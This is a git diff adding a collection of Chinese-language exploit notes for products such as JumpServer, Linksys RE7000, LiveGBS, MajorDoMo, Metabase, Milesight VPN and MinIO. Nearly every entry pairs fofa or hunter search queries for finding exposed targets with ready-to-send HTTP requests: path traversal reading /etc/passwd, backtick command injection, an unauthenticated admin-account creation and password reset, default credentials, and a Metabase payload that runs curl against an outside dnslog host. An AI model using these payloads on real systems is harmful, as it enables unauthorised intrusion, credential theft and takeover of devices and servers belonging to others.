+v1/newsfeeds/feeds/:id
+v1/newsfeeds/feeds
+v1/newsfeeds/feeds/:id
+v1/newsfeeds/feeds/:id
+v1/newsfeeds/categories
+v1/newsfeeds/categories/:id
+v1/newsfeeds/categories
+v1/newsfeeds/categories/:id
+v1/newsfeeds/categories/:id
+v1/plugins
+v1/plugins/:id
+v1/plugins/:id
+v1/privacy/requests
+v1/privacy/requests/:id
+v1/privacy/requests/export/:id
+v1/privacy/requests
+v1/privacy/consents
+v1/privacy/consents/:id
+v1/privacy/consents/:id
+v1/redirects
+v1/redirects/:id
+v1/redirects
+v1/redirects/:id
+v1/redirects/:id
+v1/tags
+v1/tags/:id
+v1/tags
+v1/tags/:id
+v1/tags/:id
+v1/templates/styles/site
+v1/templates/styles/site/:id
+v1/templates/styles/site
+v1/templates/styles/site/:id
+v1/templates/styles/site/:id
+v1/templates/styles/administrator
+v1/templates/styles/administrator/:id
+v1/templates/styles/administrator
+v1/templates/styles/administrator/:id
+v1/templates/styles/administrator/:id
+v1/users
+v1/users/:id
+v1/users
+v1/users/:id
+v1/users/:id
+v1/fields/users
+v1/fields/users/:id
+v1/fields/users
+v1/fields/users/:id
+v1/fields/users/:id
+v1/fields/groups/users
+v1/fields/groups/users/:id
+v1/fields/groups/users
+v1/fields/groups/users/:id
+v1/fields/groups/users/:id
+v1/users/groups
+v1/users/groups/:id
+v1/users/groups
+v1/users/groups/:id
+v1/users/groups/:id
+v1/users/levels
+v1/users/levels/:id
+v1/users/levels
+v1/users/levels/:id
+v1/users/levels/:id
+```
diff --git a/JumpServer存在未授权访问漏洞（CVE-2023-42442）.md b/JumpServer存在未授权访问漏洞（CVE-2023-42442）.md
new file mode 100644
index 0000000..d62e2c1
--- /dev/null
+++ b/JumpServer存在未授权访问漏洞（CVE-2023-42442）.md
@@ -0,0 +1,30 @@
+# JumpServer存在未授权访问漏洞（CVE-2023-42442）
+
+# 一、漏洞简介
+JumpServer开源堡垒机是一款运维安全审计系统产品，提供身份验证、授权控制、账号管理、安全审计等功能支持，帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式，向企业级用户交付开源增值的运维安全审计解决方案。api/api/v1/terminal/sessions/权限控制存在逻辑错误，可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志，并可借此远程窃取敏感信息。存储在 S3、OSS 或其他云存储中的ssh会话不受影响。
+
+# 二、影响版本
++ <font style="color:black;">3.0.0 <= JumpServer <= 3.5.4</font>
++ <font style="color:black;">3.6.0 <= JumpServer <= 3.6.3</font>
+
+# <font style="color:black;">三、资产测绘</font>
++ hunter`app.name="JumpServer"`
++ 特征：
+
+![1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b.png](./img/fuItFEC7-w-QTsDh/1696131346283-6a696011-dc5b-4c76-84a3-1f81b9ffb50b-786611.png)
+
+# 四、漏洞复现
+```plain
+GET /api/v1/terminal/sessions/ HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```
+
+![1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac.png](./img/fuItFEC7-w-QTsDh/1696131423235-b969b6ea-4f13-4974-8e56-53063704b1ac-468514.png)
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pgq8hot5pwuqi3oo>
\ No newline at end of file
diff --git a/KEDACOM数字系统接入网关任意文件读取漏洞.md b/KEDACOM数字系统接入网关任意文件读取漏洞.md
new file mode 100644
index 0000000..cdaf2f8
--- /dev/null
+++ b/KEDACOM数字系统接入网关任意文件读取漏洞.md
@@ -0,0 +1,33 @@
+# KEDACOM数字系统接入网关 任意文件读取漏洞
+
+# 一、漏洞简介
+KEDACOM 数字系统接入网关 存在任意文件读取漏洞，攻击者通过构造请求可以读取服务器任意文件
+
+# 二、影响版本
++ KEDACOM 数字系统接入网关
+
+# 三、资产测绘
++ hunter`web.body="/**起始端口变量*/"`
++ 特征
+
+![1700237094459-93d63897-cd43-41d4-a428-50edf148ea60.png](./img/pnKUapdSU-2Ic2-z/1700237094459-93d63897-cd43-41d4-a428-50edf148ea60-046539.png)
+
+# 四、漏洞复现
+```plain
+GET /gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: JSESSIONID=FAEECB621961790CDFC5AB87BBEB1E20; JSESSIONID=760C78AEAACEFF5C9110E58901A9AAC3
+Upgrade-Insecure-Requests: 1
+```
+
+![1700237129473-ffbbb7a7-bb7e-4f1b-8d3d-28cb8cb90790.png](./img/pnKUapdSU-2Ic2-z/1700237129473-ffbbb7a7-bb7e-4f1b-8d3d-28cb8cb90790-814993.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/agh61crlxr5redq2>
\ No newline at end of file
diff --git a/Kyan网络监控设备run.php远程命令执行漏洞.md b/Kyan网络监控设备run.php远程命令执行漏洞.md
new file mode 100644
index 0000000..90d666f
--- /dev/null
+++ b/Kyan网络监控设备run.php远程命令执行漏洞.md
@@ -0,0 +1,39 @@
+# Kyan 网络监控设备 run.php 远程命令执行漏洞
+
+# 一、漏洞简介
+Kyan 网络监控设备 run.php可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，存在远程命令执行漏洞，可以获取服务器权限。
+
+# 二、影响版本
++ Kyan 网络监控设备
+
+# 三、资产测绘
++ hunter`app.name=="Kyan 网络监控设备"`
++ 特征
+
+![1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a.png](./img/koypSHLFpr1LdmCH/1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a-230413.png)
+
+# 四、漏洞复现
+1. 通过Kyan 网络监控设备密码泄露漏洞登录系统后台
+
+```plain
+/hosts
+```
+
+![1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb.png](./img/koypSHLFpr1LdmCH/1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb-892875.png)
+
+![1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841.png](./img/koypSHLFpr1LdmCH/1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841-768767.png)
+
+2. 访问`run.php`,即可执行命令
+
+```plain
+/run.php
+```
+
+![1700735869217-7604bb3f-c59f-4273-aa02-9a842732a8ab.png](./img/koypSHLFpr1LdmCH/1700735869217-7604bb3f-c59f-4273-aa02-9a842732a8ab-341331.png)
+
+![1700735883989-6c9eab4c-8cfb-4276-865c-d7aa6f0c92c7.png](./img/koypSHLFpr1LdmCH/1700735883989-6c9eab4c-8cfb-4276-865c-d7aa6f0c92c7-578727.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/un5hy49hzv7rnell>
\ No newline at end of file
diff --git a/Kyan网络监控设备密码泄露漏洞.md b/Kyan网络监控设备密码泄露漏洞.md
new file mode 100644
index 0000000..adc9441
--- /dev/null
+++ b/Kyan网络监控设备密码泄露漏洞.md
@@ -0,0 +1,27 @@
+# Kyan 网络监控设备密码泄露漏洞
+
+# <font style="color:rgb(23, 46, 77);">一、漏洞简介</font>
+Kyan网络监控设备存在账号密码泄露漏洞，该漏洞是由于开发人员将记录账户密码的文件放到网站目录，攻击者可通过访问目录获取Kyan网络监控设备账号密码，进入控制后台。
+
+# 二、影响版本
++ Kyan 网络监控设备
+
+# 三、资产测绘
++ hunter`app.name=="Kyan 网络监控设备"`
++ 特征
+
+![1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a.png](./img/Dvtz-ra2AXLF35Rp/1700735696467-ea2f2fba-f004-4687-a3f2-dfb3a2beaa8a-066628.png)
+
+# 四、漏洞复现
+```plain
+/hosts
+```
+
+![1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb.png](./img/Dvtz-ra2AXLF35Rp/1700735729224-68725e9b-5914-45cd-b997-a65cc83fa1fb-623104.png)
+
+![1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841.png](./img/Dvtz-ra2AXLF35Rp/1700735740516-f3d3ee66-1525-470f-aa0d-b35990866841-536015.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph8dyaez8p98x1ah>
\ No newline at end of file
diff --git a/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md b/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md
new file mode 100644
index 0000000..903d455
--- /dev/null
+++ b/Linksys-RE7000无线扩展器RCE(CVE-2024-25852).md
@@ -0,0 +1,43 @@
+# Linksys-RE7000无线扩展器RCE(CVE-2024-25852)
+
+### 一、漏洞描述
+<font style="color:#000000;">Linksys RE7000无线扩展器在访问控制功能点的AccessControlList参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。</font>
+
+### 二、影响版本
+<font style="color:#000000;">Linksys RE7000无线扩展器</font>
+
+### 三、资产测绘
+body="/login.shtml?ran="
+
+![1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d.png](./img/vv1PxtfgpgbamSsw/1718333560229-60861c15-6d19-413d-86ff-12a39b9c2c6d-984843.png)
+
+界面
+
+![1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8.png](./img/vv1PxtfgpgbamSsw/1718333587335-4900165d-3c0a-4a16-8a8f-b793b87f79c8-026376.png)
+
+### 四、漏洞复现
+```plain
+PUT /goform/AccessControl HTTP/1.1
+Host: 121.137.162.121
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Length: 87
+
+{"AccessPolicy":"0","AccessControlList":"`ip a>/etc_ro/lighttpd/RE7000_www/qqi.txt`"}
+
+```
+
+构造语句进行发送
+
+![1718333420542-224485fe-1557-444d-988e-e192f2531b3a.png](./img/vv1PxtfgpgbamSsw/1718333420542-224485fe-1557-444d-988e-e192f2531b3a-604259.png)访问qqi.txt，这个文件，获取相关信息。
+
+![1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f.png](./img/vv1PxtfgpgbamSsw/1718333496307-c39af445-f271-4b7f-838a-d9a88beee01f-602094.png)
+
+
+
+> 更新: 2024-06-23 23:46:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zdaghns0azgvr8ns>
\ No newline at end of file
diff --git a/LiveGBSapidoc存在信息泄漏漏洞.md b/LiveGBSapidoc存在信息泄漏漏洞.md
new file mode 100644
index 0000000..bdef4aa
--- /dev/null
+++ b/LiveGBSapidoc存在信息泄漏漏洞.md
@@ -0,0 +1,27 @@
+# LiveGBS apidoc存在信息泄漏漏洞
+
+# 一、漏洞简介
+LiveGBS是一款基于GB28181协议的安防监控软件，专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入，可向上级联第三方国标平台，提供可视化的WEB页面管理，使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能，包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时，它支持多种协议流输出，实现浏览器无插件直播，让用户能够随时随地通过Web端查看监控画面。LiveGBS apidoc存在任意用户添加漏洞。
+
+# 二、影响版本
++ LiveGBS 
+
+# 三、资产测绘
++ fofa`icon_hash="-206100324"`
++ 特征
+
+![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/ZN46IKrPByZszen2/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-331405.png)
+
+# 四、漏洞复现
+```plain
+/apidoc/
+```
+
+![1715917410178-42ccf58e-7e43-44fa-97cd-bfa69711f4b3.png](./img/ZN46IKrPByZszen2/1715917410178-42ccf58e-7e43-44fa-97cd-bfa69711f4b3-311655.png)
+
+
+
+
+
+> 更新: 2024-05-18 12:35:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/new71fvhetd3ucay>
\ No newline at end of file
diff --git a/LiveGBSlist存在信息泄漏漏洞.md b/LiveGBSlist存在信息泄漏漏洞.md
new file mode 100644
index 0000000..bda33b3
--- /dev/null
+++ b/LiveGBSlist存在信息泄漏漏洞.md
@@ -0,0 +1,36 @@
+# LiveGBS list存在信息泄漏漏洞
+
+# 一、漏洞简介
+LiveGBS是一款基于GB28181协议的安防监控软件，专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入，可向上级联第三方国标平台，提供可视化的WEB页面管理，使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能，包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时，它支持多种协议流输出，实现浏览器无插件直播，让用户能够随时随地通过Web端查看监控画面。LiveGBS list存在信息泄漏漏洞
+
+# 二、影响版本
++ LiveGBS 
+
+# 三、资产测绘
++ fofa`icon_hash="-206100324"`
++ 特征
+
+![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/oU8IW4Y-oZEZ4Two/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-194956.png)
+
+# 四、漏洞复现
+```plain
+GET /api/v1/user/list?q=&start=0&limit=100&enable=&sort=CreatedAt&order=desc HTTP/1.1
+Host: 
+Accept: */*
+Accept-Encoding: gzip, deflate
+sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"
+sec-ch-ua-mobile: ?0
+Accept-Language: zh-CN,zh;q=0.9
+sec-ch-ua-platform: "Windows"
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
+X-Requested-With: XMLHttpRequest
+```
+
+![1715350016028-f7a9c754-ea7f-4f92-8743-04021b14f407.png](./img/oU8IW4Y-oZEZ4Two/1715350016028-f7a9c754-ea7f-4f92-8743-04021b14f407-360953.png)
+
+
+
+
+
+> 更新: 2024-05-18 12:33:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ongy3487szmdw9ti>
\ No newline at end of file
diff --git a/LiveGBSsave存在任意用户添加漏洞.md b/LiveGBSsave存在任意用户添加漏洞.md
new file mode 100644
index 0000000..d561450
--- /dev/null
+++ b/LiveGBSsave存在任意用户添加漏洞.md
@@ -0,0 +1,34 @@
+# LiveGBS save存在任意用户添加漏洞
+
+# 一、漏洞简介
+LiveGBS是一款基于GB28181协议的安防监控软件，专为集中统一管理和观看所有摄像头、硬盘录像机等设备而设计。它支持GB28181注册接入，可向上级联第三方国标平台，提供可视化的WEB页面管理，使用户能够轻松实现设备的远程监控和管理。LiveGBS具备多项强大功能，包括云台控制、设备录像检索与回放、语音对讲、用户管理等。同时，它支持多种协议流输出，实现浏览器无插件直播，让用户能够随时随地通过Web端查看监控画面。LiveGBS save存在任意用户添加漏洞。
+
+# 二、影响版本
++ LiveGBS 
+
+# 三、资产测绘
++ fofa`icon_hash="-206100324"`
++ 特征
+
+![1714840195509-17413bb5-8988-4807-907b-1335a5357ea9.png](./img/G22NguMpq0EvMZ3E/1714840195509-17413bb5-8988-4807-907b-1335a5357ea9-579412.png)
+
+# 四、漏洞复现
+```plain
+GET /api/v1/user/save?ID=&Username=root12&Role=%E7%AE%A1%E7%90%86%E5%91%98&Enable=true HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Connection: close
+```
+
+添加的用户名为`root12/12345678`
+
+![1714840241628-f71f03e1-785d-443e-b720-f1650443f616.png](./img/G22NguMpq0EvMZ3E/1714840241628-f71f03e1-785d-443e-b720-f1650443f616-327422.png)
+
+测试登录
+
+![1714840261984-9c870b53-d781-4302-b2dc-fbd1f2352b48.png](./img/G22NguMpq0EvMZ3E/1714840261984-9c870b53-d781-4302-b2dc-fbd1f2352b48-649257.png)
+
+
+
+> 更新: 2024-05-18 12:34:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qda2azg0wd52xg13>
\ No newline at end of file
diff --git a/LiveGBS任意用户密码重置漏洞.md b/LiveGBS任意用户密码重置漏洞.md
new file mode 100644
index 0000000..c74ac49
--- /dev/null
+++ b/LiveGBS任意用户密码重置漏洞.md
@@ -0,0 +1,33 @@
+# LiveGBS任意用户密码重置漏洞
+
+LiveGBS部分接口存在未授权访问导致，可以通过组合漏洞修改任意用户密码
+
+## fofa
+
+```yaml
+icon_hash="-206100324"
+```
+
+## poc
+
+### 获取用户id
+
+```
+/api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc
+```
+
+![image-20240820155005009](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550568.png)
+
+### 通过id更改用户密码
+
+```
+/api/v1/user/resetpassword?id=22&password=123456
+```
+
+![image-20240820155041297](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408201550695.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/6To5_MA83i7rEfrxlqNpAQ
\ No newline at end of file
diff --git a/MSA互联网管理网关msa任意文件下载漏洞.md b/MSA互联网管理网关msa任意文件下载漏洞.md
new file mode 100644
index 0000000..f948d39
--- /dev/null
+++ b/MSA互联网管理网关msa任意文件下载漏洞.md
@@ -0,0 +1,38 @@
+# MSA 互联网管理网关 msa 任意文件下载漏洞
+
+# 一、漏洞简介
+MSA 互联网管理网关存在任意文件读取漏洞，攻击者通过漏洞可以读取服务器任意文件
+
+# 二、影响版本
++ MSA 互联网管理网关
+
+# 三、资产测绘
++ hunter`web.icon=="73043af39b293ade8de257c2370de7bd"`
++ 特征
+
+![1700220436423-12e9551e-d966-4699-88e7-29994ba0e863.png](./img/rLV0S0GyUOO9zx0g/1700220436423-12e9551e-d966-4699-88e7-29994ba0e863-060740.png)
+
+# 四、漏洞复现
+```plain
+GET /msa/../../../../etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: msasessionid=-1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1700220466285-4e1ffc5d-51d5-48f8-a65c-55206c11be18.png](./img/rLV0S0GyUOO9zx0g/1700220466285-4e1ffc5d-51d5-48f8-a65c-55206c11be18-983178.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gysgn5ydeuqlba2w>
\ No newline at end of file
diff --git a/MailCow存在Swagger未授权访问漏洞.md b/MailCow存在Swagger未授权访问漏洞.md
new file mode 100644
index 0000000..5660965
--- /dev/null
+++ b/MailCow存在Swagger未授权访问漏洞.md
@@ -0,0 +1,23 @@
+# MailCow存在Swagger未授权访问漏洞
+
+# 一、漏洞描述
+MailCow存在Swagger未授权访问漏洞
+
+# 二、影响版本
+```plain
+body="mailcow UI"
+```
+
+![1726728574313-fbbd314e-12b7-42e9-8b56-5f51102d7ca2.png](./img/DGUfk23vVpL0DKHY/1726728574313-fbbd314e-12b7-42e9-8b56-5f51102d7ca2-654594.png)
+
+# 三、漏洞复现
+```plain
+/api/
+```
+
+![1726728554359-ff8707e4-1509-43a2-a5d8-908081765a25.png](./img/DGUfk23vVpL0DKHY/1726728554359-ff8707e4-1509-43a2-a5d8-908081765a25-993923.png)
+
+
+
+> 更新: 2024-10-22 09:41:43  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vm2u62qvqqrsgzrq>
\ No newline at end of file
diff --git a/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md b/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md
new file mode 100644
index 0000000..8150be7
--- /dev/null
+++ b/MajorDoMothumb未授权RCE漏洞(CNVD-2024-02175).md
@@ -0,0 +1,30 @@
+# MajorDoMo thumb未授权RCE漏洞(CNVD-2024-02175)
+
+# 一、漏洞简介
+MajorDoMo是MajorDoMo社区的一个开源DIY 智能家居Q自动化平台。MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞，未经身份验证的攻击者可利用此漏洞执行任意指令，获取服务器权限。
+
+# 二、影响版本
++ MajorDoMo< 0662e5e
+
+# 三、资产测绘
++ fofa`app="MajordomoSL"`
++ 特征
+
+![1713627397596-ec6aa3a7-c04f-4580-9b3f-5b5aea561b6d.png](./img/2ovjcaHaRtUQroVP/1713627397596-ec6aa3a7-c04f-4580-9b3f-5b5aea561b6d-828706.png)
+
+# 四、漏洞复现
+```plain
+GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+Accept-Charset: utf-8
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![1713627778412-e955f94f-c4ec-466d-b9ec-d72be405ea16.png](./img/2ovjcaHaRtUQroVP/1713627778412-e955f94f-c4ec-466d-b9ec-d72be405ea16-632435.png)
+
+
+
+> 更新: 2024-04-20 23:45:27  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nlakvnouzm2wkdy4>
\ No newline at end of file
diff --git a/MasterSAM接口downloadService任意文件读取.md b/MasterSAM接口downloadService任意文件读取.md
new file mode 100644
index 0000000..eda18e4
--- /dev/null
+++ b/MasterSAM接口downloadService任意文件读取.md
@@ -0,0 +1,24 @@
+# MasterSAM接口downloadService任意文件读取
+
+**MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞，未经身份验证的攻击者可以通过该漏洞下载服务器任意文件，从而获取大量敏感信息。**
+
+## fofa
+
+```javascript
+body="MasterSAM"
+```
+
+## poc
+
+```javascript
+GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
+Host: your-ip
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502131406477.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/f35n0-9OOME5gSsiwEv0Vg
\ No newline at end of file
diff --git a/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md b/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md
new file mode 100644
index 0000000..b754759
--- /dev/null
+++ b/Metabase-validate-远程命令执行漏洞(CVE-2023-38646).md
@@ -0,0 +1,35 @@
+## Metabase validate 远程命令执行漏洞（CVE-2023-38646）
+网络测绘
+app=“元数据库” 
+
+/api/session/properties
+```
+POST /api/setup/validate HTTP/1.1
+Host: 
+Content-Type: application/json
+Content-Length: 812
+
+{
+    "token": "e56e2c0f-71bf-4e15-9879-d964f319be69",
+    "details":
+    {
+        "is_on_demand": false,
+        "is_full_sync": false,
+        "is_sample": false,
+        "cache_ttl": null,
+        "refingerprint": false,
+        "auto_run_queries": true,
+        "schedules":
+        {},
+        "details":
+        {
+            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
+            "advanced-options": false,
+            "ssl": true
+        },
+        "name": "an-sec-research-team",
+        "engine": "h2"
+    }
+}
+
+```
diff --git a/Milesight-VPN任意文件读取漏洞.md b/Milesight-VPN任意文件读取漏洞.md
new file mode 100644
index 0000000..f743a85
--- /dev/null
+++ b/Milesight-VPN任意文件读取漏洞.md
@@ -0,0 +1,43 @@
+# Milesight-VPN任意文件读取漏洞
+
+# 一、漏洞简介
+Milesight-VPN是由Milesight Technology Co., Ltd.开发的一种集成了VPN功能的路由器产品。它旨在为用户提供安全、可靠的远程访问和连接解决方案。Milesight-VPN存在任意文件读取，攻击者可以通过利用系统中存在的漏洞，获取未经授权的访问权限并读取系统上的任意文件。
+
+# 二、影响版本
++ Milesight-VPN
+
+# 三、资产测绘
++ fofa`app="Milesight-VPN"`
++ 特征
+
+![1694363541225-b2d7009f-1a45-440f-9ce4-b9886ca6d50f.png](./img/hnnyUMi80IkIJfou/1694363541225-b2d7009f-1a45-440f-9ce4-b9886ca6d50f-861710.png)
+
+# 四、漏洞复现
+```plain
+GET  /../etc/passwd HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: cross-site
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1694363570704-5a0d5f4f-fc61-4977-80fc-964096a5034a.png](./img/hnnyUMi80IkIJfou/1694363570704-5a0d5f4f-fc61-4977-80fc-964096a5034a-296494.png)
+
+数据库配置
+
+```java
+/../milesight_vpn/server/connect.js
+```
+
+
+
+> 更新: 2024-02-29 23:57:14  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pp2gsuw28o5qcs9l>
\ No newline at end of file
diff --git a/MinIO存在信息泄露漏洞(CVE-2023-28432).md b/MinIO存在信息泄露漏洞(CVE-2023-28432).md
new file mode 100644
index 0000000..167dd7f
--- /dev/null
+++ b/MinIO存在信息泄露漏洞(CVE-2023-28432).md
@@ -0,0 +1,33 @@
+# MinIO存在信息泄露漏洞(CVE-2023-28432)
+
+# 一、漏洞简介
+MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。在集群模式中，MinIO的某些接口会因为信息处理不当而返回会返回所有环境变量，包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD，导致敏感信息泄露。使用分布式部署的所有用户都会受到影响。
+
+# 二、影响版本
++ MinIO-Console
+
+# 三、资产测绘
++ fofa`app="MinIO-Console"`
+
+![1716315120880-badae565-3d74-4618-82f2-e007a55b192e.png](./img/mDAR4TLtjAvbzixi/1716315120880-badae565-3d74-4618-82f2-e007a55b192e-789868.png)
+
+# 四、漏洞复现
+```plain
+POST /minio/bootstrap/v1/verify HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+```
+
+![1721112869285-5be4e488-a938-4d94-972b-e751f22a0e91.png](./img/mDAR4TLtjAvbzixi/1721112869285-5be4e488-a938-4d94-972b-e751f22a0e91-230369.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yrxgtl2ou0ils7bm>
\ No newline at end of file
diff --git a/MinIO存在默认口令漏洞.md b/MinIO存在默认口令漏洞.md
new file mode 100644
index 0000000..f679159
--- /dev/null
+++ b/MinIO存在默认口令漏洞.md
@@ -0,0 +1,24 @@
+# MinIO存在默认口令漏洞
+
+# 一、漏洞简介
+MinIO是基于GNU Affero通用公共许可证v3.0发布的高性能对象存储。兼容Amazon S3云存储服务的API。使用MinIO为机器学习、分析和应用程序数据工作负载构建高性能基础设施。MinIO存在默认口令漏洞
+
+# 二、影响版本
++ MinIO-Console
+
+# 三、资产测绘
++ fofa`app="MinIO-Console"`
+
+![1716315120880-badae565-3d74-4618-82f2-e007a55b192e.png](./img/DH6NiDR61tGcTYxP/1716315120880-badae565-3d74-4618-82f2-e007a55b192e-461340.png)
+
+# 四、漏洞复现
+```plain
+minioadmin/minioadmin
+```
+
+![1716353537032-5279d3f9-718f-443c-9b20-b761766c32c2.png](./img/DH6NiDR61tGcTYxP/1716353537032-5279d3f9-718f-443c-9b20-b761766c32c2-175600.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
